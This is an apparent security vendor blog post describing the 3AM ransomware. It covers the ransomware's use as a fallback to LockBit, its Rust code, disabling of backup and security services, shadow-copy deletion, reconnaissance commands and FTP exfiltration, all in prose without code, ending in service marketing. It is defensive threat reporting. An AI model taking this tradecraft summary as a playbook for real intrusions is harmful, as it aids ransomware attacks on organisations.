Under Attack? Breach Response Hotline: Call 833.997.7327 (US/CAN)

3AM Ransomware

Chris Swagler | November 6th, 2023


In a digital realm teeming with evolving cyber threats, a new variant named the 3AM ransomware has recently surfaced, marking its presence with a distinct modus operandi. This article delves into the discovery, characteristics, and implications of this emerging malware, shedding light on the ever-evolving landscape of cybersecurity.

A Fallback Strategy Unveils 3AM Ransomware

The spotlight initially fell on 3AM when it was employed as a fallback plan by a ransomware affiliate. The threat operator had previously attempted to deploy the notorious LockBit ransomware, often attributed to the Bitwise Spider or Syrphid groups, but encountered obstacles. As a result, the threat actor resorted to 3AM, making this malware’s existence known.

The Enigmatic Origins of 3AM Ransomware

A defining feature of 3AM is its unique coding. This ransomware is written in Rust, a language not associated with any known ransomware family. This distinction sets it apart as a wholly new and uncharted breed of malware. The creators and affiliates behind 3AM remain mysterious, with no discernible connections to established cybercrime groups.

The Intricate Dance of 3AM Ransomware

Before encrypting files, 3AM follows a series of pre-encryption signals. It attempts to disable multiple services running on the compromised system, specifically targeting security and backup products from prominent vendors such as Veeam, Acronis, Ivanti, McAfee, and Symantec. This meticulous approach neutralizes potential obstacles that might hinder the encryption process. Once the encryption procedure is complete, files receive the “.THREEAMTIME” extension. Additionally, the malware strives to eliminate Volume Shadow copies, eliminating any chances of data recovery.

The Tantalizing Clues

The journey of a 3AM ransomware attack commences with a “gpresult” command, extracting the system’s policy settings for a designated user. This reconnaissance phase is followed by a series of commands commonly used for network enumeration, server enumeration, user persistence, and utilizing the Wput FTP client to transmit stolen files to the threat operator’s server. Symantec’s analysis reveals that the 3AM executable recognizes various command-line parameters, including an access key, an encryption method (local or net), and parameters related to encryption speed control.

The Limited Impact of 3AM

Despite being a new and relatively unfamiliar threat, 3 AM’s debut in the cyber arena was unsuccessful. In a specific incident, the threat actor deployed the ransomware on only three machines within the target organization. Encouragingly, defense mechanisms thwarted its activities on two of these systems, highlighting the resilience of existing cybersecurity measures.

A Glimpse into the Future

The emergence of 3AM ransomware underscores the ever-evolving nature of cyber threats. As it gained prominence as an alternative to LockBit, it will likely attract the interest of other malicious actors. The cybersecurity community should remain vigilant, as 3AM may evolve and adapt, potentially posing a more significant threat.

The rise of 3AM ransomware is a stark reminder of the perpetual cat-and-mouse game between cybercriminals and defenders. While this new entrant was only partially successful in its debut, its existence signals a potential shift in the threat landscape. As cybersecurity professionals continue to adapt and fortify their defenses, the world watches closely for the next chapter in this ongoing cyber saga.

At SpearTip, our certified engineers work at our 24/7/365 Security Operations Center to continuously monitor companies’ data networks for new and current ransomware threats. They are ready to respond to incidents at a moment’s notice. Our risk assessments are designed to uncover security gaps and are accompanied by a technical summary complete with an individualized risk report detailing necessary steps to remediate the gaps. The ShadowSpear Platform, our integrable managed detection and response tool, uses comprehensive insights through unparalleled data normalization and visualizations to expose sophisticated unknown and advanced ransomware threats. Providing cybersecurity awareness training will help companies and their employees better understand the risks of the cyber landscape and develop impactful cybersecurity practices that can reduce the likelihood of cyberattacks.

If your company is experiencing a breach, call our Security Operations Centers at 833.997.7327 to speak directly with an engineer.


Connect With Us

Featured Articles

IT Workers
Extra Advice on the IT Workers in North Korea
29 November 2023
Ransomware Attacks
The 10 Most Impactful Ransomware Attacks in History
27 November 2023
Cloud Backups
Security Strategy: Cloud Backups for Ransomware Protection
25 November 2023
Blog Images (15)
How To Maintain Personal Cybersecurity While Shopping Online
21 November 2023

See ShadowSpear in Action

Identify, neutralize, and counter cyberattacks - provide confidence in your security posture

Stay Connected With SpearTip

Inside the SOC Newsletter

View our articles that cover trending topics in cybersecurity with insights from our 24/7/365 Security Operations Center.

ShadowSpear Platform

Cybersecurity actors are working around the clock, shouldn’t your security team be too? Technology solutions and security controls fail for a number of reasons, poor deployment, improper implementation, or just no one monitoring the alerts.

ShadowSpear Demo

Experience ShadowSpear for yourself. Our lightweight, integrated solution will help you sleep easier at night and provide immediate confidence in your security posture.